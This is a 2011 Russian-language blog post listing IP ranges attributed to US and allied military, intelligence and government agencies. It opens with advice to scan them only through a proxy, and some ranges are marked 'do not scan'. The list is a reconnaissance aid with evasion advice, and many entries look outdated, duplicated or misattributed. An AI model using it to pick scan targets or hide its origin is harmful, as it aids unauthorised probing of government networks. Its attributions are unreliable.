-Поиск по дневнику

Поиск сообщений в r00t_666

 -Подписка по e-mail

 

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 04.06.2011
Записей:
Комментариев:
Написано: 24





IP адреса американских военных ведомств и спец.служб

Суббота, 16 Июля 2011 г. 07:26 + в цитатник
Собственно сабж!
Сканировать эти адреса без прокси не рекомендуеться!

RANGE 6
6.* - Army Information Systems Center

RANGE 7
7.*.*.* Defense Information Systems Agency, VA

RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC

RANGE 21
21. - US Defense Information Systems Agency

RANGE 22
22.* - Defense Information Systems Agency

RANGE 24
24.198.*.*

RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26
26.* - Defense Information Systems Agency

RANGE 29
29.* - Defense Information Systems Agency

RANGE 30
30.* - Defense Information Systems Agency

RANGE 49
49.* - Joint Tactical Command

RANGE 50
50.* - Joint Tactical Command

RANGE 55
55.* - Army National Guard Bureau

RANGE 55
55.* - Army National Guard Bureau

RANGE 62
62.0.0.1 - 62.30.255.255 Do not scan!

RANGE 64
64.70.*.* Do not scan
64.224.* Do not Scan
64.225.* Do not scan
64.226.* Do not scan

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 66SPTG-SCB
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.139.0.0 Army Armament Research Development and Engineering Center
129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0 Honeywell Defense Systems Group
130.165.0.0 U.S.Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.3.0.0 - 131.3.255.255 Mather Air Force Base
131.6.0.0 Langley Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.22.0.0 Keesler Air Force Base
131.24.0.0 6 Communications Squadron
131.25.0.0 Patrick Air Force Base
131.27.0.0 75 ABW
131.30.0.0 62 CS/SCSNT
131.32.0.0 37 Communications Squadron
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN
131.40.0.0 Bergstrom Air Force Base
131.44.0.0 Randolph Air Force Base
131.46.0.0 20 Communications Squadron
131.47.0.0 Andersen Air Force Base
131.50.0.0 Davis-Monthan Air Force Base
131.52.0.0 56 Communications Squadron /SCBB
131.54.0.0 Air Force Concentrator Network
131.56.0.0 Upper Heyford Air Force Base
131.58.0.0 Alconbury Royal Air Force Base
131.59.0.0 7 Communications Squadron
131.61.0.0 McConnell Air Force Base
131.62.0.0 Norton Air Force Base
131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
131.74.0.0 Defense MegaCenter Columbus
131.84.0.0 Defense Technical Information Center
131.92.0.0 Army Information Systems Command - Aberdeen (EA)
131.105.0.0 McClellan Air Force Base
131.110.0.0 NASA/Michoud Assembly Facility
131.120.0.0 Naval Postgraduate School
131.121.0.0 United States Naval Academy
131.122.0.0 United States Naval Academy
131.176.0.0 European Space Operations Center
131.182.0.0 NASA Headquarters
131.250.0.0 Office of the Chief of Naval Research

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 319 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 786 CS/SCBM
132.27.0.0 - 132.27.255.255 39CS/SCBBN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 Lajes Air Force Base
132.31.0.0 Loring Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K.I. Sawyer Air Force Base
132.40.0.0 347 COMMUNICATION SQUADRON
132.42.0.0 Spangdahlem Air Force Base
132.43.0.0 Zweibruchen Air Force Base
132.45.0.0 Chanute Air Force Base
132.46.0.0 Columbus Air Force Base
132.48.0.0 Laughlin Air Force Base
132.49.0.0 366CS/SCSN
132.50.0.0 Reese Air Force Base
132.52.0.0 Vance Air Force Base
132.54.0.0 Langley AFB
132.55.0.0 Torrejon Air Force Base
132.56.0.0 - 132.56.255.255 9 CS/SC
132.57.0.0 Castle Air Force Base
132.58.0.0 Nellis Air Force Base
132.59.0.0 24Comm Squadron\SCSNA
132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
132.61.0.0 SSG/SIN
132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
132.79.0.0 Army National Guard Bureau
132.80.0.0 - 132.80.255.255 NGB-AIS-OS
132.80.0.0 - 132.85.255.255 National Guard Bureau
132.82.0.0 Army National Guard Bureau
132.86.0.0 National Guard Bureau
132.87.0.0 - 132.93.255.255 National Guard Bureau
132.94.0.0 Army National Guard Bureau
132.95.0.0 - 132.103.255.255 National Guard Bureau
132.95.0.0 - 132.108.0.0 DOD Network Information Center
132.104.0.0 - 132.104.255.255 Army National Guard Bureau
132.105.0.0 - 132.108.255.255 Army National Guard Bureau
132.109.0.0 National Guard Bureau
132.110.0.0 - 132.116.255.255 Army National Guard Bureau
132.114.0.0 Army National Guard
132.117.0.0 Army National Guard Bureau
132.118.0.0 - 132.132.0.0 Army National Guard Bureau
132.122.0.0 South Carolina Army National Guard, USPFO
132.133.0.0 National Guard Bureau
132.134.0.0 - 132.143.255.255 National Guard Bureau
132.159.0.0 Army Information Systems Command
132.193.0.0 Army Research Office
132.250.0.0 Naval Research Laboratory

RANGE 134
134.5.0.0 Lockheed Aeronautical Systems Company
134.11.0.0 The Pentagon
134.12.0.0 NASA Ames Research Center
134.51.0.0 Boeing Military Aircraft Facility
134.52.*.* Boeing Corporation
134.78.0.0 Army Information Systems Command-ATCOM
134.80.0.0 Army Information Systems Command
134.118.0.0 NASA/Johnson Space Center
134.131.0.0 Wright-Patterson Air Force Base
134.136.0.0 Wright-Patterson Air Force Base
134.164.0.0 Army Engineer Waterways Experiment Station
134.165.0.0 Headquarters Air Force Space Command
134.194.0.0 U.S. Army Aberdeen Test Center
134.205.0.0 7th Communications Group
134.207.0.0 Naval Research Laboratory
134.229.0.0 Navy Regional Data Automation Center
134.230.0.0 Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255 U.S. Army, Europe
134.233.0.0 HQ 5th Signal Command
134.234.0.0 - 134.234.255.255 Southern European Task Force
134.235.0.0 HQ 5th Signal Command
134.240.0.0 U.S. Military Academy
136.149.0.0 Air Force Military Personnel Center

RANGE 136
136.178.0.0 NASA Research Network
136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
136.207.0.0 69th Signal Battalion
136.208.0.0 HQ, 5th Signal Command
136.209.0.0 HQ 5th Signal Command
136.210.0.0 HQ 5th Signal Command
136.212.0.0 HQ 5th Signal Command
136.213.0.0 HQ, 5th Signal Command
136.214.0.0 HQ, 5th Signal Command
136.215.0.0 HQ, 5th Signal Command
136.216.0.0 HQ, 5th Signal Command
136.217.0.0 HQ, 5th Signal Command
136.218.0.0 HQ, 5th Signal Command
136.219.0.0 HQ, 5th Signal Command
136.220.0.0 HQ, 5th Signal Command
136.221.0.0 HQ, 5th Signal Command
136.222.0.0 HQ, 5th Signal Command


RANGE 137
137.1.0.0 Whiteman Air Force Base
137.2.0.0 George Air Force Base
137.3.0.0 Little Rock Air Force Base
137.4.0.0 - 137.4.255.255 437 CS/SC
137.5.0.0 Air Force Concentrator Network
137.6.0.0 Air Force Concentrator Network
137.11.0.0 HQ AFSPC/SCNNC
137.12.0.0 Air Force Concentrator Network
137.17.* National Aerospace Laboratory
137.24.0.0 Naval Surface Warfare Center
137.29.0.0 First Special Operations Command
137.67.0.0 Naval Warfare Assessment Center
137.94.* Royal Military College
137.95.* Headquarters, U.S. European Command
137.126.0.0 USAF MARS
137.127.* Army Concepts Analysis Agency
137.128.* U.S. ARMY Tank-Automotive Command
137.130.0.0 Defense Information Systems Agency
137.209.0.0 Defense Information Systems Agency
137.210.0.0 Defense Information Systems Agency
137.211.0.0 Defense Information Systems Agency
137.212.0.0 Defense Information Systems Agency
137.231.0.0 HQ 5th Signal Command
137.232.0.0 Defense Information Systems Agency
137.233.0.0 Defense Information Systems Agency
137.234.0.0 Defense Information Systems Agency
137.235.0.0 Defense Information Systems Agency
137.240.0.0 Air Force Materiel Command
137.241.0.0 75 ABW
137.242.0.0 Air Force Logistics Command
137.243.0.0 77 CS/SCCN
137.244.0.0 78 CS/SCSC
137.245.0.0 Wright Patterson Air Force Base
137.246.0.0 United States Atlantic Command Joint Training

RANGE 138
138.13.0.0 Air Force Systems Command
138.27.0.0 Army Information Systems Command
138.50.0.0 HQ 5th Signal Command
138.65.0.0 HQ, 5th Signal Command
138.76.0.0 NASA Headquarters
138.109.0.0 Naval Surface Warfare Center
138.115.0.0 NASA Information and Electronic Systems Laboratory
138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications Station
138.137.0.0 Navy Regional Data Automation Center (NARDAC)
138.139.0.0 Marine Corps Air Station
138.140.0.0 Navy Regional Data Automation Center
138.141.0.0 Navy Regional Data Automation Center
138.142.0.0 Navy Regional Data Automation Center
138.143.0.0 Navy Regional Data Automation Center
138.144.0.0 NAVCOMTELCOM
138.145.0.0 NCTS WASHINGTON
138.146.0.0 NCTC
138.147.0.0 NCTC
138.148.0.0 NCTC
138.149.0.0 NCTC
138.150.0.0 NCTC
138.151.0.0 NCTC
138.152.0.0 NCTC
138.153.0.0 Yokosuka Naval Base
138.154.0.0 NCTC
138.155.0.0 NCTC
138.156.0.0 Marine Corps Central Design & Prog. Activity
138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog. Activity
138.158.0.0 Marine Corps Central Design & Prog. Activity
138.159.0.0 NCTC
138.160.0.0 Naval Air Station
138.161.0.0 NCTC
138.162.0.0 NCTC
138.163.0.0 NCTC
138.164.0.0 NCTC
138.165.0.0 NCTC
138.166.0.0 NCTC
138.167.0.0 NOC, MCTSSA, East
138.168.0.0 Marine Corps Central Design & Prog. Activity
138.169.0.0 NAVAL COMPUTER AND TELECOMM
138.169.12.0 NAVAL COMPUTER AND TELECOMM
138.169.13.0 NAVAL COMPUTER AND TELECOMM
138.170.0.0 NCTC
138.171.0.0 NCTC
138.172.0.0 NCTC
138.173.0.0 NCTC
138.174.0.0 NCTC
138.175.0.0 NCTC
138.176.0.0 NCTC
138.177.0.0 NCTS Pensacola
138.178.0.0 NCTC
138.179.0.0 NCTC
138.180.0.0 NCTC
138.181.0.0 NCTC
138.182.0.0 CNO N60
138.183.0.0 NCTC
138.184.0.0 NCTS
138.193.0.0 NASA/Yellow Creek

RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.32.0.0 48th Tactical Fighter Wing
139.33.0.0 36th Tactical Fighter Wing
139.34.0.0 52nd Tactical Fighter Wing
139.35.0.0 50th Tactical Fighter Wing
139.36.0.0 66th Electronic Combat Wing
139.37.0.0 26th Tactical Reconnaissance Wing
139.38.0.0 32nd Tactical Fighter Squadron
139.39.0.0 81st Tactical Fighter Wing
139.40.0.0 10th Tactical Fighter Wing
139.41.0.0 39th Tactical Air Control Group
139.42.0.0 40th Tactical Air Control Group
139.43.0.0 401st Tactical Fighter Wing
139.124.* Reseau Infomratique
139.142.*.*

RANGE 140
140.1.0.0 Defense Information Systems Agency
140.3.0.0 Defense Information Systems Agency
140.4.0.0 Defense Information Systems Agency
140.5.0.0 Defense Information Systems Agency
140.6.0.0 Defense Information Systems Agency
140.7.0.0 Defense Information Systems Agency
140.8.0.0 Defense Information Systems Agency
140.9.0.0 Defense Information Systems Agency
140.10.0.0 Defense Information Systems Agency
140.11.0.0 Defense Information Systems Agency
140.12.0.0 Defense Information Systems Agency
140.13.0.0 Defense Information Systems Agency
140.14.0.0 DISA Columbus Level II NOC
140.15.0.0 Defense Information Systems Agency
140.16.0.0 Defense Information Systems Agency
140.17.0.0 Defense Information Systems Agency
140.18.0.0 Defense Information Systems Agency
140.19.0.0 Defense Information Systems Agency
140.20.0.0 Defense Information Systems Agency
140.21.0.0 Defense Information Systems Agency
140.22.0.0 Defense Information Systems Agency
140.23.0.0 Defense Information Systems Agency
140.24.0.0 ASIC ALLIANCE-MARLBORO
140.25.0.0 Defense Information Systems Agency
140.26.0.0 Defense Information Systems Agency
140.27.0.0 Defense Information Systems Agency
140.28.0.0 Defense Information Systems Agency
140.29.0.0 Defense Information Systems Agency
140.30.0.0 Defense Information Systems Agency
140.31.0.0 Defense Information Systems Agency
140.32.0.0 Defense Information Systems Agency
140.33.0.0 Defense Information Systems Agency
140.34.0.0 Defense Information Systems Agency
140.35.0.0 Defense Information Systems Agency
140.36.0.0 Defense Information Systems Agency
140.37.0.0 Defense Information Systems Agency
140.38.0.0 Defense Information Systems Agency
140.39.0.0 Defense Information Systems Agency
140.40.0.0 Defense Information Systems Agency
140.41.0.0 Defense Information Systems Agency
140.42.0.0 Defense Information Systems Agency
140.43.0.0 Defense Information Systems Agency
140.44.0.0 Defense Information Systems Agency
140.45.0.0 Defense Information Systems Agency
140.46.0.0 Defense Information Systems Agency
140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
140.47.0.0 - 140.48.255.255 DOD Network Information Center
140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
140.49.0.0 Defense Information Systems Agency
140.50.0.0 Defense Information Systems Agency
140.51.0.0 Defense Information Systems Agency
140.52.0.0 Defense Information Systems Agency
140.53.0.0 Defense Information Systems Agency
140.54.0.0 Defense Information Systems Agency
140.55.0.0 Defense Information Systems Agency
140.56.0.0 Defense Information Systems Agency
140.57.0.0 Defense Information Systems Agency
140.58.0.0 Defense Information Systems Agency
140.59.0.0 Defense Information Systems Agency
140.60.0.0 Defense Information Systems Agency
140.61.0.0 Defense Information Systems Agency
140.62.0.0 Defense Information Systems Agency
140.63.0.0 Defense Information Systems Agency
140.64.0.0 Defense Information Systems Agency
140.65.0.0 Defense Information Systems Agency
140.66.0.0 Defense Information Systems Agency
140.67.0.0 Defense Information Systems Agency
140.68.0.0 Defense Information Systems Agency
140.69.0.0 Defense Information Systems Agency
140.70.0.0 Defense Information Systems Agency
140.71.0.0 Defense Information Systems Agency
140.72.0.0 Defense Information Systems Agency
140.73.0.0 Defense Information Systems Agency
140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
140.100.0.0 Naval Sea Systems Command
140.139.0.0 HQ US Army Medical Research and Development Command
140.154.0.0 HQ 5th Signal Command
140.155.0.0 HQ, 5th Signal Command
140.156.0.0 HQ, 5th Signal Command
140.175.0.0 Scott Air Force Base
140.178.0.0 Naval Undersea Warfare Center Division, Keyport
140.187.0.0 Fort Bragg
140.194.0.0 US Army Corps of Engineers
140.195.0.0 Naval Sea Systems Command
140.199.0.0 Naval Ocean Systems Center
140.201.0.0 HQ, 5th Signal Command
140.202.0.0 106TH SIGNAL BRIGADE

RANGE 143
143.45.0.0 58th Signal Battalion
143.46.0.0 U.S. Army, 1141st Signal Battalion
143.68.0.0 Headquarters, USAISC
143.69.0.0 Headquarters, USAAISC
143.70.0.0 Headquarters, USAAISC
143.71.0.0 Headquarters, USAAISC
143.72.0.0 Headquarters, USAAISC
143.73.0.0 Headquarters, USAAISC
143.74.0.0 Headquarters, USAAISC
143.75.0.0 Headquarters, USAAISC
143.76.0.0 Headquarters, USAAISC
143.77.0.0 Headquarters, USAAISC
143.78.0.0 Headquarters, USAAISC
143.79.0.0 Headquarters, USAAISC
143.80.0.0 Headquarters, USAAISC
143.81.0.0 Headquarters, USAAISC
143.82.0.0 Headquarters, USAAISC
143.84.0.0 Headquarters, USAAISC
143.85.0.0 Headquarters, USAAISC
143.86.0.0 Headquarters, USAAISC
143.87.0.0 Headquarters, USAAISC
143.232.0.0 NASA Ames Research Center

RANGE 144
144.99.0.0 United States Army Information Systems Command
144.109.0.0 Army Information Systems Command
144.143.0.0 Headquarters, Third United States Army
144.144.0.0 Headquarters, Third United States Army
144.146.0.0 Commander, Army Information Systems Center
144.147.0.0 Commander, Army Information Systems Center
144.170.0.0 HQ, 5th Signal Command
144.192.0.0 United States Army Information Services Command-Campbell
144.233.0.0 Defense Intelligence Agency
144.234.0.0 Defense Intelligence Agency
144.235.0.0 Defense Intelligence Agency
144.236.0.0 Defense Intelligence Agency
144.237.0.0 Defense Intelligence Agency
144.238.0.0 Defense Intelligence Agency
144.239.0.0 Defense Intelligence Agency
144.240.0.0 Defense Intelligence Agency
144.241.0.0 Defense Intelligence Agency
144.242.0.0 Defense Intelligence Agency
144.252.0.0 U.S. Army LABCOM

RANGE 146
146.17.0.0 HQ, 5th Signal Command
146.80.0.0 Defence Research Agency
146.98.0.0 HQ United States European Command
146.154.0.0 NASA/Johnson Space Center
146.165.0.0 NASA Langley Research Center

RANGE 147
147.35.0.0 HQ, 5th Signal Command
147.36.0.0 HQ, 5th Signal Command
147.37.0.0 HQ, 5th Signal Command
147.38.0.0 HQ, 5th Signal Command
147.39.0.0 HQ, 5th Signal Command
147.40.0.0 HQ, 5th Signal Command
147.42.0.0 Army CALS Project
147.103.0.0 Army Information Systems Software Center
147.104.0.0 Army Information Systems Software Center
147.159.0.0 Naval Air Warfare Center, Aircraft Division
147.168.0.0 Naval Surface Warfare Center
147.169.0.0 HQ, 5th Signal Command
147.198.0.0 Army Information Systems Command
147.199.0.0 Army Information Systems Command
147.238.0.0 Army Information Systems Command
147.239.0.0 1112th Signal Battalion
147.240.0.0 US Army Tank-Automotive Command
147.242.0.0 19th Support Command
147.248.0.0 Fort Monroe DOIM
147.254.0.0 7th Communications Group

RANGE 148
148.114.0.0 NASA, Stennis Space Center

RANGE 150
150.113.0.0 1114th Signal Battalion
150.114.0.0 1114th Signal Battalion
150.125.0.0 Space and Naval Warfare Command
150.133.0.0 10th Area Support Group
150.144.0.0 NASA Goodard Space Flight Center
150.149.0.0 Army Information Systems Command
150.157.0.0 USAISC-Fort Lee
150.184.0.0 Fort Monroe DOIM
150.190.0.0 USAISC-Letterkenny
150.196.0.0 USAISC-LABCOM

RANGE 152
152.82.0.0 7th Communications Group of the Air Force
152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0 NATO Headquarters
152.154.0.0 Defense Information Systems Agency
152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153
153.21.0.0 USCENTAF/SCM
153.22.0.0 USCENTAF/SCM
153.23.0.0 USCENTAF/SCM
153.24.0.0 USCENTAF/SCM
153.25.0.0 USCENTAF/SCM
153.26.0.0 USCENTAF/SCM
153.27.0.0 USCENTAF/SCM
153.28.0.0 USCENTAF/SCM
153.29.0.0 USCENTAF/SCM
153.30.0.0 USCENTAF/SCM
153.31.0.0 Federal Bureau of Investigation

RANGE 155
155.5.0.0 1141st Signal Bn
155.6.0.0 1141st Signal Bn
155.7.0.0 American Forces Information
155.8.0.0 U.S. ArmyFort Gordon
155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
155.74.0.0 PEO STAMIS
155.75.0.0 US Army Corps of Engineers
155.76.0.0 PEO STAMIS
155.77.0.0 PEO STAMIS
155.78.0.0 PEO STAMIS
155.79.0.0 US Army Corps of Engineers
155.80.0.0 PEO STAMIS
155.81.0.0 PEO STAMIS
155.82.0.0 PEO STAMIS
155.83.0.0 US Army Corps of Enginers
155.84.0.0 PEO STAMIS
155.85.0.0 PEO STAMIS
155.86.0.0 US Army Corps of Engineers
155.87.0.0 PEO STAMIS
155.88.0.0 PEO STAMIS
155.96.0.0 Drug Enforcement Administration
155.149.0.0 1112th Signal Battalion
155.155.0.0 HQ, 5th Signal Command
155.178.0.0 Federal Aviation Administration
155.213.0.0 USAISC Fort Benning
155.214.0.0 Director of Information Management
155.215.0.0 USAISC-FT DRUM
155.216.0.0 TCACCIS Project Management Office
155.217.0.0 Directorate of Information Management
155.218.0.0 USAISC
155.219.0.0 DOIM/USAISC Fort Sill
155.220.0.0 USAISC-DOIM
155.221.0.0 USAISC-Ft Ord

RANGE 156
156.9.0.0 U. S. Marshals Service

RANGE 157
157.150.0.0 United Nations
157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
157.202.0.0 US Special Operations Command
157.217.0.0 U. S. Strategic Command

RANGE 158
158.1.0.0 Commander, Tooele Army Depot
158.2.0.0 USAMC Logistics Support Activity
158.3.0.0 U.S. Army TACOM
158.4.0.0 UASISC Ft. Carson
158.5.0.0 1112th Signal Battalion
158.6.0.0 USAISC-Ft. McCoy
158.7.0.0 USAISC-FLW
158.8.0.0 US Army Soldier Support Center
158.9.0.0 USAISC-CECOM
158.10.0.0 GOC
158.11.0.0 UASISC-Vint Hill
158.12.0.0 US Army Harry Diamond Laboratories
158.13.0.0 USAISC DOIM
158.14.0.0 1112th Signal Battalion
158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
158.16.0.0 Rocky Mountain Arsenal (PMRMA)
158.17.0.0 Crane Army Ammunition Activity
158.18.0.0 Defense Finance & Accounting Service Center
158.19.0.0 DOIM
158.20.0.0 DOIM
158.235.0.0 Marine Corps Central Design and Programming Activity
158.243.0.0 Marine Corps Central Design and Programming Activity
158.244.0.0 Marine Corps Central Design and Programming Activity
158.245.0.0 Marine Corps Central Design and Programming Activity
158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159
159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160
160.132.0.0 US Army Recruiting Command
160.135.0.0 36th Signal BN
160.138.0.0 USAISC
160.139.0.0 USAISC
160.140.0.0 HQ, United States Army
160.143.0.0 USAISC
160.145.0.0 1101st Signal Brigade
160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161
161.124.0.0 NAVAL WEAPONS STATION

RANGE 162
162.32.0.0 Naval Aviation Depot Pensacola
162.45.0.0 Central Intelligence Agency
162.46.0.0 Central Intelligence Agency

RANGE 163
163.205.0.0 NASA Kennedy Space Center
163.206.0.0 NASA Kennedy Space Center

RANGE 164
164.45.0.0 Naval Ordnance Center, Pacific Division
164.49.0.0 United States Army Space and Strategic Defense
164.158.0.0 Naval Surface Warfare Center
164.217.0.0 Institute for Defense Analyses
164.218.0.0 Bureau of Naval Personnel
164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
164.221.0.0 - 164.221.255.255 Information Technology
164.223.0.0 Naval Undersea Warfare Center
164.224.0.0 Secretary of the Navy
164.225.0.0 U.S. Army Intelligence and Security Command
164.226.0.0 Naval Exchange Service Command
164.227.0.0 Naval Surface Warfare Center, Crane Division
164.228.0.0 USCINCPAC J21T
164.229.0.0 NCTS-NOLA
164.230.0.0 Naval Aviation Depot
164.231.0.0 Military Sealift Command
164.232.0.0 - 164.232.255.255 United States Southern Command

RANGE 167
167.44.0.0 Government Telecommunications Agency

RANGE 168
168.68.0.0 USDA Office of Operations
168.85.0.0 Fort Sanders Alliance
168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 194

RANGE 195
195.10.* Various - Do not scan

RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203
203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 204
204.34.0.0 - 204.34.15.0 IPC JAPAN
204.34.0.0 - 204.37.255.0 DOD Network Information Center
204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
204.34.32.0 - 204.34.63.0 USACOM
204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
204.34.128.0 DISA-Eucom / BBN-STD, Inc.
204.34.129.0 Defense Technical Information Center
204.34.130.0 GSI
204.34.131.0 NSA NAPLES ITALY
204.34.132.0 NAVSTA ROTA SPAIN
204.34.133.0 NAS SIGONELLA ITALY
204.34.134.0 Naval Air Warfare Center Aircraft Division
204.34.135.0 GSI
204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
204.34.137.0 Joint Spectrum Center
204.34.138.0 GSI
204.34.139.0 HQ, JFMO Korea, Headquarters
204.34.140.0 DISA D75
204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
204.34.142.0 Naval Enlisted Personnel Management Center
204.34.143.0 Afloat Training Group Pacific
204.34.144.0 HQ Special Operations Command - Europe
204.34.145.0 Commander Naval Base Pearl Harbor
204.34.147.0 NAVSEA Information Management Improvement Program
204.34.148.0 Q112
204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
204.34.150.0 Resource Consultants, Inc.
204.34.151.0 Personnel Support Activity, San Diego
204.34.152.0 NAVAL AIR FACILITY, ADAK
204.34.153.0 NAVSEA Logistics Command Detachment
204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
204.34.156.0 Defense Photography School
204.34.157.0 - 204.34.160.0 Defense Information School
204.34.161.0 Naval Air Systems Command
204.34.162.0 Puget Sound Naval Shipyard
204.34.163.0 Joint Precision Strike Demonstration
204.34.164.0 Naval Pacific Meteorology and Ocean
204.34.165.0 Joint Precision Strike Demonstration
204.34.167.0 USAF
204.34.168.0 Commander
204.34.169.0 Naval Air Warfare Center
204.34.170.0 Naval Air Systems Command
204.34.171.0 NAVSTA SUPPLY DEPARTMENT
204.34.173.0 SUBMEPP Activity
204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
204.34.176.0 DISA-PAC,IPC-GUAM
204.34.177.0 Satellite Production Test Center
204.34.181.0 940 Air Refueling Wing
204.34.182.0 Defense Megacenter Warner Robins
204.34.183.0 GCCS Support Facility
204.34.184.0 Nav Air Tech Serv Facility-Detachment
204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
204.34.186.0 Defense Logistics Agency - Europe
204.34.187.0 NAVMASSO
204.34.188.0 Commander-In-Chief, US Pacific Fleet
204.34.189.0 Defense MegaCenter - St Louis
204.34.190.0 NAVMASSO
204.34.192.0 HQ SOCEUR
204.34.193.0 Second Marine Expeditionary Force
204.34.194.0 Second Marine Expeditionary Force
204.34.195.0 Second Marine Expeditionary Force
204.34.196.0 NAVCOMTELSTAWASHDC
204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.198.0 Naval Observatory Detachment, Colorado
204.34.199.0 NAVILCODETMECH
204.34.200.0 Navy Environmental Preventive Medicine
204.34.201.0 Port Hueneme Division, Naval Surf
204.34.202.0 Naval Facilities Engineering Housing
204.34.203.0 NAVSEA Logistics Command Detachment
204.34.204.0 Naval Air Warfare Center
204.34.205.0 Portsmouth Naval Shipyard
204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
204.34.211.0 USAF Academy
204.34.212.0 3rd Combat Service Support
204.34.213.0 1st Radio Battalion
204.34.214.0 OASD (Health Affairs)
204.34.215.0 Second Marine Expeditionary Force
